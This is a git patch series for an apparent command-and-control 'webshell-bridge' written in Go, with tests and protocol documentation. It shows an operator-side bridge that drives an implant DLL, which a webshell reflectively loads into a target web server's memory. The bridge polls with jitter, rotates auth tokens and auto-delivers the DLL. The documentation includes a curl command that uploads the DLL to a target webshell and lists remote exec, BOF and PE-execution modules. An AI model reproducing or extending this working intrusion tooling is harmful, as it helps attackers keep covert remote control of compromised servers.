i) - } + if err := ch.Close(); err != nil { + t.Fatalf("second close: %v", err) } +} - if len(received) != numResponses { - t.Fatalf("expected %d responses, got %d", numResponses, len(received)) - } - for i, name := range received { - expected := "chunk:" + string(rune('A'+i)) - if name != expected { - t.Errorf("response %d: expected %q, got %q", i, expected, name) - } - } +func TestChannelForwardAfterClose(t *testing.T) { + ch := NewChannel("http://localhost:1", "") + ch.Close() - ch.CloseStream(taskID) + _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) + if err == nil { + t.Fatal("expected error forwarding on closed channel") + } } -func TestChannelCloseStream(t *testing.T) { - // Verify that CloseStream removes the channel so subsequent dispatches - // are dropped (logged as "no waiter"). - mock := newMockMaleficDLL(t) - defer mock.close() - - const taskID uint32 = 200 +func TestChannelStreamDispatch(t *testing.T) { + srv, mock := startMockWebshell(t) - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return + var callCount int + var mu sync.Mutex + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("LOADED"), 200 } - defer conn.Close() - - // Handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, + if stage == "init" { + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, mock.sessionID) + return append(sid, regData...), 200 } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read initial request - testReadMaleficFrame(conn) - - // Send first response - testWriteMaleficFrame(conn, &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "first", TaskId: taskID}}, - }, mock.sessionID) - - // Small delay for CloseStream to execute - time.Sleep(100 * time.Millisecond) + if stage == "spite" { + mu.Lock() + callCount++ + n := callCount + 
mu.Unlock() - // Send second response (should be dropped after CloseStream) - testWriteMaleficFrame(conn, &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "second", TaskId: taskID}}, - }, mock.sessionID) - }() + // First call: return a streaming response + if n <= 3 { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: "stream-chunk", + TaskId: 100, + }}, + } + data, _ := proto.Marshal(resp) + return data, 200 + } + // After that: empty + empty, _ := proto.Marshal(&implantpb.Spites{}) + return empty, 200 + } + return nil, 404 + }) - ch := dialMockDLL(t, mock.addr()) + ch := NewChannel(srv.URL, "") defer ch.Close() - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - respCh := ch.OpenStream(taskID) + respCh := ch.OpenStream(100) ch.StartRecvLoop() - if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "req"}); err != nil { - t.Fatalf("send: %v", err) - } - - // Receive first response + // Wait for poll to deliver a response select { case spite := <-respCh: - if spite.Name != "first" { - t.Errorf("expected 'first', got %q", spite.Name) + if spite.Name != "stream-chunk" { + t.Errorf("expected 'stream-chunk', got %q", spite.Name) } - case <-time.After(2 * time.Second): - t.Fatal("timeout waiting for first response") + case <-time.After(3 * time.Second): + t.Fatal("timeout waiting for streamed response") } - // Close the stream - ch.CloseStream(taskID) - - // Second response should be dropped — the channel should not receive it. - // Wait briefly to let the mock DLL send it. 
- time.Sleep(200 * time.Millisecond) - - select { - case _, ok := <-respCh: - if ok { - t.Error("received unexpected response after CloseStream") - } - default: - // Expected: nothing in channel - } -} - -func TestChannelCloseIdempotent(t *testing.T) { - ch := &Channel{ - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), - } - - if err := ch.Close(); err != nil { - t.Fatalf("close without conn: %v", err) - } - if err := ch.Close(); err != nil { - t.Fatalf("double close: %v", err) - } -} - -func TestChannelForwardAfterClose(t *testing.T) { - ch := &Channel{ - closed: true, - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), - } - - _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err == nil { - t.Fatal("expected error forwarding on closed channel") - } + ch.CloseStream(100) } diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go index 800a9d43..0775a376 100644 --- a/server/cmd/webshell-bridge/config.go +++ b/server/cmd/webshell-bridge/config.go @@ -8,6 +8,21 @@ type Config struct { ListenerIP string // listener external IP PipelineName string // pipeline name Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) - DLLAddr string // target-side malefic bind DLL address (e.g. 127.0.0.1:13338) + StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) Debug bool // enable debug logging } + +// WebshellHTTPURL converts the suo5:// URL to an http(s):// URL. 
+func (c *Config) WebshellHTTPURL() string { + if len(c.Suo5URL) < 6 { + return c.Suo5URL + } + switch { + case len(c.Suo5URL) > 6 && c.Suo5URL[:6] == "suo5s:": + return "https:" + c.Suo5URL[6:] + case len(c.Suo5URL) > 5 && c.Suo5URL[:5] == "suo5:": + return "http:" + c.Suo5URL[5:] + default: + return c.Suo5URL + } +} diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go index 443aa74f..62eb1232 100644 --- a/server/cmd/webshell-bridge/main.go +++ b/server/cmd/webshell-bridge/main.go @@ -8,9 +8,7 @@ import ( "os/signal" "syscall" - "github.com/chainreactors/IoM-go/consts" "github.com/chainreactors/logs" - "github.com/gookit/config/v2" ) func main() { @@ -21,12 +19,12 @@ func main() { flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") - flag.StringVar(&cfg.DLLAddr, "dll-addr", "127.0.0.1:13338", "target-side malefic bind DLL address") + flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") flag.Parse() if cfg.AuthFile == "" || cfg.Suo5URL == "" { - fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 \n") + fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 --token \n") flag.PrintDefaults() os.Exit(1) } @@ -42,7 +40,6 @@ func main() { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - // Handle graceful shutdown sigCh := make(chan os.Signal, 1) signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) go func() { @@ -51,9 +48,6 @@ func main() { cancel() }() - // Initialize packet length config for the malefic parser. 
- config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) - bridge, err := NewBridge(cfg) if err != nil { logs.Log.Errorf("failed to create bridge: %v", err) diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go index 2bd4cd4e..14cce93c 100644 --- a/server/cmd/webshell-bridge/session.go +++ b/server/cmd/webshell-bridge/session.go @@ -19,7 +19,7 @@ type Session struct { PipelineID string ListenerID string - channel *Channel + channel ChannelIface } // NewSession reads the malefic handshake from the DLL (SysInfo + Modules) @@ -28,7 +28,7 @@ func NewSession( rpc listenerrpc.ListenerRPCClient, ctx context.Context, id, pipelineID, listenerID string, - channel *Channel, + channel ChannelIface, ) (*Session, error) { // Read registration data from DLL via malefic handshake reg, err := channel.Handshake() @@ -52,7 +52,7 @@ func NewSession( SessionId: id, PipelineId: pipelineID, ListenerId: listenerID, - RawId: channel.sessionID, + RawId: channel.SessionID(), RegisterData: reg, Target: fmt.Sprintf("webshell://%s", id), }) @@ -60,7 +60,7 @@ func NewSession( return nil, fmt.Errorf("register session: %w", err) } - logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.sessionID) + logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.SessionID()) return sess, nil } @@ -112,7 +112,5 @@ func (s *Session) Alive() bool { if s.channel == nil { return false } - s.channel.closeMu.Lock() - defer s.channel.closeMu.Unlock() - return !s.channel.closed + return !s.channel.IsClosed() } diff --git a/server/cmd/webshell-bridge/transport.go b/server/cmd/webshell-bridge/transport.go deleted file mode 100644 index 91783d78..00000000 --- a/server/cmd/webshell-bridge/transport.go +++ /dev/null @@ -1,131 +0,0 @@ -package main - -import ( - "context" - "fmt" - "net" - "net/url" - "sync" - "time" - - proxysuo5 
"github.com/chainreactors/proxyclient/suo5" - suo5core "github.com/zema1/suo5/suo5" -) - -// Transport manages the suo5 tunnel connection to the target webshell. -type Transport struct { - rawURL *url.URL - mu sync.Mutex - client *proxysuo5.Suo5Client -} - -// NewTransport creates a transport adapter for the given suo5 URL. -// Supported schemes: suo5:// (HTTP), suo5s:// (HTTPS). -func NewTransport(rawURL string) (*Transport, error) { - u, err := url.Parse(rawURL) - if err != nil { - return nil, fmt.Errorf("parse suo5 URL: %w", err) - } - if u.Scheme != "suo5" && u.Scheme != "suo5s" { - return nil, fmt.Errorf("unsupported suo5 scheme: %s", u.Scheme) - } - if u.Host == "" { - return nil, fmt.Errorf("missing suo5 host") - } - - return &Transport{ - rawURL: u, - }, nil -} - -// Dial establishes a TCP connection through the suo5 tunnel to the given address. -// The returned net.Conn transparently tunnels through the webshell's HTTP channel. -func (t *Transport) Dial(network, address string) (net.Conn, error) { - return t.DialContext(context.Background(), network, address) -} - -// DialContext establishes a TCP connection through the suo5 tunnel and binds -// the initial HTTP request to ctx so cancellation interrupts the dial. 
-func (t *Transport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { - if err := t.initClient(); err != nil { - return nil, err - } - if ctx == nil { - ctx = context.Background() - } - switch network { - case "", "tcp", "tcp4", "tcp6": - default: - return nil, fmt.Errorf("unsupported network: %s", network) - } - - conn := &suo5NetConn{ - Suo5Conn: suo5core.NewSuo5Conn(ctx, t.client.Conf.Suo5Client), - } - if err := conn.Connect(address); err != nil { - return nil, err - } - return conn, nil -} - -func (t *Transport) initClient() error { - t.mu.Lock() - defer t.mu.Unlock() - - if t.client != nil { - return nil - } - if t.rawURL == nil { - return fmt.Errorf("missing suo5 URL") - } - - conf, err := proxysuo5.NewConfFromURL(t.rawURL) - if err != nil { - return fmt.Errorf("init suo5 config: %w", err) - } - t.client = &proxysuo5.Suo5Client{ - Proxy: t.rawURL, - Conf: conf, - } - return nil -} - -type suo5NetConn struct { - *suo5core.Suo5Conn - remoteAddr string -} - -// Write normalizes the return value from the underlying suo5 chunked writer. -// In half-duplex mode the underlying Write wraps data in a frame and returns -// the frame length rather than the original data length. Callers (e.g. -// cio.WriteMsg) expect n == len(p) on success, so we fix it here. 
-func (conn *suo5NetConn) Write(p []byte) (int, error) { - n, err := conn.Suo5Conn.Write(p) - if err != nil { - return n, err - } - if n > len(p) { - n = len(p) - } - return n, nil -} - -func (conn *suo5NetConn) LocalAddr() net.Addr { - return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1)} -} - -func (conn *suo5NetConn) RemoteAddr() net.Addr { - return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1), Port: 0} -} - -func (conn *suo5NetConn) SetDeadline(_ time.Time) error { - return nil -} - -func (conn *suo5NetConn) SetReadDeadline(_ time.Time) error { - return nil -} - -func (conn *suo5NetConn) SetWriteDeadline(_ time.Time) error { - return nil -} diff --git a/server/cmd/webshell-bridge/transport_test.go b/server/cmd/webshell-bridge/transport_test.go deleted file mode 100644 index 17004a56..00000000 --- a/server/cmd/webshell-bridge/transport_test.go +++ /dev/null @@ -1,58 +0,0 @@ -package main - -import ( - "testing" -) - -func TestNewTransportValidURL(t *testing.T) { - tests := []struct { - name string - url string - }{ - {"suo5 HTTP", "suo5://target.com/suo5.jsp"}, - {"suo5 HTTPS", "suo5s://target.com/suo5.jsp"}, - {"suo5 with port", "suo5://target.com:8080/suo5.jsp"}, - {"suo5 with path", "suo5://10.0.0.1/app/suo5.aspx"}, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - tr, err := NewTransport(tt.url) - if err != nil { - t.Fatalf("NewTransport(%q) error: %v", tt.url, err) - } - if tr.rawURL == nil { - t.Fatal("rawURL is nil") - } - if tr.rawURL.Scheme == "" { - t.Fatal("rawURL scheme is empty") - } - if tr.rawURL.Host == "" { - t.Fatal("rawURL host is empty") - } - if tr.client != nil { - t.Fatal("client should be initialized lazily") - } - }) - } -} - -func TestNewTransportInvalidURL(t *testing.T) { - tests := []struct { - name string - url string - }{ - {"empty", ""}, - {"no scheme", "target.com/suo5.jsp"}, - {"bad scheme", "://target.com"}, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - _, err := NewTransport(tt.url) - 
if err == nil { - t.Fatalf("NewTransport(%q) expected error, got nil", tt.url) - } - }) - } -} From b95d771241b28295fd992a22e4b6645cfabcf2c8 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 18:26:10 +0800 Subject: [PATCH 08/19] docs(protocol): update webshell bridge for HTTP memory channel architecture --- docs/protocol/webshell-bridge.md | 149 +++++++++++++++++-------------- 1 file changed, 84 insertions(+), 65 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index e60a84cb..b1ac7eb0 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -2,11 +2,11 @@ ## Overview -WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) by establishing a communication channel via suo5 HTTP tunnels. The architecture has three clean layers: +WebShell Bridge enables IoM to operate through webshells (JSP/PHP/ASPX) using a memory channel architecture. The bridge DLL is loaded into the web server process memory, and the webshell calls DLL exports directly via function pointers — no TCP ports opened on the target. -- **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. No knowledge of rem/suo5/proxyclient required. -- **Implementation layer**: Bridge binary runs on the operator machine, managing transport (rem + proxyclient + suo5), session lifecycle, and task forwarding. -- **Transport layer**: The webshell only handles initial DLL loading and raw HTTP body send/receive. It never parses protocol bytes. +- **Product layer**: Server sees a `CustomPipeline(type="webshell")`. Operators interact via `webshell new/start/stop/delete` commands. +- **Implementation layer**: Bridge binary runs on the operator machine, sending HTTP requests to the webshell with `X-Stage` headers. 
+- **Transport layer**: The webshell loads the DLL, resolves exports, and calls `bridge_init`/`bridge_process` directly. Pure memory channel. ## Architecture @@ -27,39 +27,35 @@ Bridge Binary (server/cmd/webshell-bridge/) ───────────────────────────────────────── Runs on operator machine, connects to Server via ListenerRPC (mTLS) - ┌─ transport adapter ──────────────────────────────────────┐ - │ rem (internal, not exposed as product concept) │ - │ proxyclient/suo5 (HTTP full-duplex tunnel) │ - └──────────────────────────────────────────────────────────┘ + ┌─ HTTP transport ───────────────────────────────────────┐ + │ HTTP POST with X-Stage headers to webshell URL │ + │ Raw protobuf over HTTP body (no malefic framing) │ + └────────────────────────────────────────────────────────┘ - ┌─ spite/session adapter ──────────────────────────────────┐ - │ SpiteStream ↔ rem channel protocol translation │ - │ Session registration, checkin, task routing │ - └──────────────────────────────────────────────────────────┘ + ┌─ spite/session adapter ────────────────────────────────┐ + │ SpiteStream ↔ HTTP request/response translation │ + │ Session registration, checkin, task routing │ + └────────────────────────────────────────────────────────┘ Target Web Server Process ───────────────────────── WebShell (JSP/PHP/ASPX) - - Initial bridge DLL loading (reflective/memory) - - HTTP body send/receive - - Pass raw bytes to bridge, no parsing + - Bridge DLL loading (ReflectiveLoader) + - Export resolution (bridge_init, bridge_process) + - X-Stage: spite → call bridge_process() → return response + - No port opened, no TCP loopback Bridge Runtime DLL (in web server process memory) - ┌─ transport adapter ─────────────────────────────────┐ - │ rem server on 127.0.0.1: │ - │ Bridge binary connects as rem client via suo5 │ - └─────────────────────────────────────────────────────┘ - - ┌─ spite/session adapter ─────────────────────────────┐ - │ Receives Spite over rem channel │ - │ Routes to module 
runtime by spite.Name │ - └─────────────────────────────────────────────────────┘ - - ┌─ malefic module runtime ────────────────────────────┐ - │ exec / bof / execute_pe / upload / download / ... │ - │ All malefic modules available │ - └─────────────────────────────────────────────────────┘ + ┌─ export interface ────────────────────────────────┐ + │ bridge_init() → Register (SysInfo + Modules) │ + │ bridge_process() → Spites in/out (protobuf) │ + └───────────────────────────────────────────────────┘ + + ┌─ malefic module runtime ─────────────────────────┐ + │ exec / bof / execute_pe / upload / download / ...│ + │ All malefic modules available │ + └──────────────────────────────────────────────────┘ ``` ## Data Flow @@ -67,32 +63,33 @@ Target Web Server Process ``` Client exec("whoami") → Server (SpiteStream) - → Bridge binary (session adapter) - → [rem channel through suo5 HTTP tunnel] - → Bridge Runtime DLL (module runtime) + → Bridge binary (HTTP POST X-Stage: spite) + → WebShell (calls bridge_process via function pointer) + → DLL module runtime → exec("whoami") → "root" - → Spite response over rem channel - → [suo5 HTTP tunnel] + → Spite response returned from bridge_process + → HTTP response body → Bridge binary → SpiteStream.Send(response) → Server → Client displays "root" ``` ## Usage -### 1. Run bridge binary +### 1. Build and run bridge binary ```bash +go build -o webshell-bridge ./server/cmd/webshell-bridge/ + webshell-bridge \ --auth listener.auth \ - --suo5 suo5://target.com/suo5.jsp \ + --suo5 suo5://target.com/suo5.aspx \ --listener my-listener \ - --pipeline webshell_my-listener \ - --dll-addr 127.0.0.1:13338 + --token CHANGE_ME_RANDOM_TOKEN ``` -The `--dll-addr` flag tells the bridge binary which address to connect to through the suo5 tunnel (default: `127.0.0.1:13338`). This must match the DLL's compiled `DEFAULT_ADDR` in `malefic-bridge-dll/src/lib.rs` and the webshell's status probe port (`BRIDGE_DLL_PORT` in PHP, port constant in ASPX/JSP). 
Changing the port requires updating all three locations and recompiling the DLL. +The `--token` must match the `STAGE_TOKEN` constant in the webshell. The suo5 URL is converted to HTTP(S) automatically (`suo5://` → `http://`, `suo5s://` → `https://`). -At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline start/stop/sync control. It does **not** auto-register or auto-start the `CustomPipeline`. +At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline control messages. ### 2. Register and start the pipeline from Client/TUI @@ -100,13 +97,19 @@ At startup the bridge registers the listener, opens `JobStream`, and waits for p webshell new --listener my-listener ``` -This creates `CustomPipeline(type="webshell")` and sends the pipeline start control to the already running bridge. +### 3. Deploy webshell + load bridge DLL -### 3. Deploy suo5 webshell + bridge DLL on target +Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server, then send the bridge DLL: -Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. The webshell loads the bridge DLL into the web server process memory. The bridge DLL starts a rem server on `127.0.0.1:13338` (or the port matching `--dll-addr`). +```bash +curl -X POST \ + -H "X-Stage: load" \ + -H "X-Token: CHANGE_ME_RANDOM_TOKEN" \ + --data-binary @bridge.dll \ + http://target.com/suo5.aspx +``` -If the DLL is not loaded when the pipeline starts, the bridge keeps retrying `connectDLL` with exponential backoff until the rem server becomes reachable or the retry budget is exhausted. +The webshell loads the DLL via ReflectiveLoader, then resolves `bridge_init`/`bridge_process` exports from the mapped PE image. If the DLL is not loaded when the pipeline starts, the bridge retries with exponential backoff. ### 4. 
Interact @@ -117,40 +120,56 @@ upload /local/file /remote/path download /remote/file ``` -## Rem Channel Protocol +## Protocol -The bridge binary communicates with the bridge DLL using the rem wire protocol over a TCP connection tunneled through suo5. +### HTTP Endpoints (X-Stage headers) -### Wire Format +| Stage | Method | Description | +|-------|--------|-------------| +| `load` | POST | Load bridge DLL into memory (body = raw DLL bytes) | +| `status` | POST | Check if DLL is loaded (returns `LOADED` or `NOT_LOADED`) | +| `init` | POST | Get Register data from `bridge_init()` (returns `[4B sessionID LE][Register protobuf]`) | +| `spite` | POST | Process Spites via `bridge_process()` (body/response = serialized `Spites` protobuf) | -Each message: `[1 byte msg_type][4 bytes LE length][protobuf payload]` +All stage requests require `X-Token` header matching `STAGE_TOKEN`. -Uses `cio.WriteMsg`/`cio.ReadMsg` from `github.com/chainreactors/rem/protocol/cio`. +### DLL Export Interface -### Session Lifecycle +The bridge DLL must export these functions: -``` -1. Bridge dials DLL: transport.Dial("tcp", dllAddr) [through suo5] -2. Login handshake: Login{Agent: id, Mod: "bridge"} → Ack{Status: 1} -3. DLL sends: Packet{ID: 0, Data: Marshal(Register{SysInfo, Modules})} -4. Bridge registers session with server using real SysInfo/Modules -5. 
Task exchange: Packet{ID: taskID, Data: Marshal(Spite)} ↔ bidirectional -``` +```c +// Initialize and return serialized Register protobuf +// Output format: [4 bytes sessionID LE][Register protobuf bytes] +int __stdcall bridge_init( + uint8_t* out_buf, // output buffer + uint32_t out_cap, // buffer capacity + uint32_t* out_len // actual bytes written +); // returns 0 on success + +// Process serialized Spites protobuf, return response Spites +int __stdcall bridge_process( + uint8_t* in_buf, // input Spites protobuf + uint32_t in_len, // input length + uint8_t* out_buf, // output buffer for response Spites + uint32_t out_cap, // buffer capacity + uint32_t* out_len // actual bytes written +); // returns 0 on success -### DLL Requirements +// Optional: cleanup +int __stdcall bridge_destroy(); +``` -The bridge DLL (malefic create branch) must: -1. Start a rem-compatible TCP listener on the configured port -2. Accept Login, respond with Ack -3. Send a handshake Packet{ID: 0} containing serialized `implantpb.Register` -4. For each received Packet, unmarshal the Spite, execute the module, and reply with a Packet containing the response Spite +The DLL must also export `ReflectiveLoader` for the loading phase. The webshell uses ReflectiveLoader to map the DLL, then resolves `bridge_init`/`bridge_process` from the mapped image's export table. 
## Key Files | Purpose | Path | |---------|------| | Bridge binary | `server/cmd/webshell-bridge/` | -| Rem channel | `server/cmd/webshell-bridge/channel.go` | +| Channel (HTTP) | `server/cmd/webshell-bridge/channel.go` | +| Session management | `server/cmd/webshell-bridge/session.go` | | Client commands | `client/command/pipeline/webshell.go` | | CustomPipeline (server) | `server/listener/custom.go` | -| proxyclient/suo5 | `github.com/chainreactors/proxyclient/suo5` | +| Webshell (ASPX) | `suo5-webshell/suo5.aspx` | +| Webshell (PHP) | `suo5-webshell/suo5.php` | +| Webshell (JSP) | `suo5-webshell/suo5.jsp` | From b9b3c020194bd60bff431a157ed384215ad9564f Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 19:09:11 +0800 Subject: [PATCH 09/19] feat(webshell-bridge): add long-poll, HMAC auth, jitter and DLL auto-load - Replace fixed-interval polling with adaptive long-poll (idle/active) - Add HMAC-SHA256 time-based token rotation for secrets >32 chars - Add jitter to poll intervals to avoid request synchronization - Add --dll flag for automatic DLL delivery via X-Stage: load - Accept tcp/empty pipeline types alongside webshell --- server/cmd/webshell-bridge/bridge.go | 28 +++- server/cmd/webshell-bridge/channel.go | 179 ++++++++++++++++----- server/cmd/webshell-bridge/channel_test.go | 63 ++++++++ server/cmd/webshell-bridge/config.go | 1 + server/cmd/webshell-bridge/main.go | 1 + 5 files changed, 231 insertions(+), 41 deletions(-) diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go index 61673b0a..02889c81 100644 --- a/server/cmd/webshell-bridge/bridge.go +++ b/server/cmd/webshell-bridge/bridge.go @@ -5,6 +5,7 @@ import ( "errors" "fmt" "io" + "os" "strconv" "sync" "time" @@ -114,6 +115,18 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error channel := NewChannel(b.cfg.WebshellHTTPURL(), b.cfg.StageToken) logs.Log.Importantf("waiting for DLL at %s ...", 
b.cfg.WebshellHTTPURL()) + // Read DLL bytes once if --dll is provided. + var dllBytes []byte + if b.cfg.DLLPath != "" { + var err error + dllBytes, err = os.ReadFile(b.cfg.DLLPath) + if err != nil { + return fmt.Errorf("read DLL file %s: %w", b.cfg.DLLPath, err) + } + logs.Log.Importantf("loaded DLL from %s (%d bytes)", b.cfg.DLLPath, len(dllBytes)) + } + + dllDelivered := false delay := retryBaseDelay for attempt := 1; attempt <= retryMaxAttempts; attempt++ { select { @@ -123,6 +136,17 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } if err := channel.Connect(ctx); err != nil { + // Auto-load DLL if we have it and haven't delivered yet. + if dllBytes != nil && !dllDelivered { + logs.Log.Importantf("DLL not loaded, delivering via X-Stage: load (%d bytes)", len(dllBytes)) + if loadErr := channel.LoadDLL(ctx, dllBytes); loadErr != nil { + logs.Log.Warnf("DLL delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, loadErr) + } else { + logs.Log.Important("DLL delivered, waiting for reflective load") + dllDelivered = true + } + } + logs.Log.Debugf("DLL not ready (attempt %d/%d): %v (retry in %s)", attempt, retryMaxAttempts, err, delay) if attempt == retryMaxAttempts { @@ -260,8 +284,8 @@ func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) err if pipe == nil { return fmt.Errorf("missing pipeline in start job") } - if pipe.GetType() != pipelineType { - return fmt.Errorf("unsupported pipeline type %q", pipe.GetType()) + if t := pipe.GetType(); t != pipelineType && t != "tcp" && t != "" { + return fmt.Errorf("unsupported pipeline type %q", t) } if err := b.ensurePipelineMatch(pipe.GetName()); err != nil { return err diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go index 8746a2a0..c927bfb3 100644 --- a/server/cmd/webshell-bridge/channel.go +++ b/server/cmd/webshell-bridge/channel.go @@ -3,10 +3,16 @@ package main import ( "bytes" "context" + "crypto/hmac" + 
"crypto/sha256" "crypto/tls" + "encoding/binary" + "encoding/hex" "fmt" "io" + "math/rand" "net/http" + "strconv" "sync" "sync/atomic" "time" @@ -18,15 +24,20 @@ import ( ) const ( - httpTimeout = 30 * time.Second - pollInterval = 500 * time.Millisecond + httpTimeout = 30 * time.Second + longPollTimeout = 10 * time.Second + pollIdleInterval = 5 * time.Second + pollActiveInterval = 200 * time.Millisecond + jitterFactor = 0.3 streamChanBuffer = 16 - stageInit = "init" - stageSpite = "spite" - stageStatus = "status" - headerStage = "X-Stage" - headerToken = "X-Token" - headerSessionID = "X-Session-ID" + stageLoad = "load" + stageInit = "init" + stageSpite = "spite" + stageStatus = "status" + headerStage = "X-Stage" + headerToken = "X-Token" + headerSessionID = "X-Session-ID" + headerPollTimeout = "X-Poll-Timeout" ) // ChannelIface abstracts the communication channel to the bridge DLL. @@ -77,7 +88,7 @@ func NewChannel(webshellURL, token string) *Channel { webshellURL: webshellURL, token: token, client: &http.Client{ - Timeout: httpTimeout, + Timeout: longPollTimeout + 5*time.Second, Transport: &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, @@ -100,6 +111,15 @@ func (c *Channel) Connect(ctx context.Context) error { return nil } +// LoadDLL sends the bridge DLL to the webshell for reflective loading. +func (c *Channel) LoadDLL(ctx context.Context, dllBytes []byte) error { + _, err := c.doRequest(ctx, stageLoad, dllBytes) + if err != nil { + return fmt.Errorf("load DLL: %w", err) + } + return nil +} + // Handshake calls bridge_init on the DLL via the webshell and returns // the Register message containing SysInfo and module list. 
func (c *Channel) Handshake() (*implantpb.Register, error) { @@ -136,41 +156,106 @@ func (c *Channel) StartRecvLoop() { } func (c *Channel) pollLoop(ctx context.Context) { - ticker := time.NewTicker(pollInterval) - defer ticker.Stop() - for { + c.pendMu.Lock() + hasPending := len(c.pending) > 0 + c.pendMu.Unlock() + + if !hasPending { + // No active streaming tasks — idle wait, no HTTP request. + select { + case <-ctx.Done(): + return + case <-c.closeCh: + return + case <-time.After(jitter(pollIdleInterval)): + } + continue + } + + // Active streaming tasks — send long-poll request with timeout hint. + empty := &implantpb.Spites{} + data, err := proto.Marshal(empty) + if err != nil { + continue + } + respBody, err := c.doLongPollRequest(ctx, data) + if err != nil { + if ctx.Err() != nil { + return + } + logs.Log.Debugf("poll error: %v", err) + select { + case <-ctx.Done(): + return + case <-c.closeCh: + return + case <-time.After(jitter(pollActiveInterval)): + } + continue + } + + hasData := c.dispatchResponse(respBody) + + // Adaptive interval: fast when data is flowing, slow down when idle. + var interval time.Duration + if hasData { + interval = pollActiveInterval + } else { + interval = pollIdleInterval + } select { case <-ctx.Done(): return case <-c.closeCh: return - case <-ticker.C: - c.pendMu.Lock() - hasPending := len(c.pending) > 0 - c.pendMu.Unlock() - if !hasPending { - continue - } - - empty := &implantpb.Spites{} - data, err := proto.Marshal(empty) - if err != nil { - continue - } - respBody, err := c.doRequest(ctx, stageSpite, data) - if err != nil { - if ctx.Err() != nil { - return - } - logs.Log.Debugf("poll error: %v", err) - continue - } - c.dispatchResponse(respBody) + case <-time.After(jitter(interval)): } } } +// doLongPollRequest sends a spite-stage request with X-Poll-Timeout header, +// telling the webshell to hold the connection until data is available or timeout. 
+func (c *Channel) doLongPollRequest(ctx context.Context, body []byte) ([]byte, error) { + var bodyReader io.Reader + if body != nil { + bodyReader = bytes.NewReader(body) + } + + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) + if err != nil { + return nil, err + } + req.Header.Set(headerStage, stageSpite) + req.Header.Set(headerPollTimeout, strconv.Itoa(int(longPollTimeout.Seconds()))) + if c.token != "" { + req.Header.Set(headerToken, tokenForHeader(c.token)) + } + if c.sidSet.Load() { + req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := c.client.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + respBody, _ := io.ReadAll(resp.Body) + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) + } + + return io.ReadAll(resp.Body) +} + +// jitter adds ±jitterFactor random variation to an interval. +func jitter(d time.Duration) time.Duration { + delta := float64(d) * jitterFactor + return d + time.Duration(delta*(2*rand.Float64()-1)) +} + // Forward sends a Spite and waits for a single response (unary request-response). 
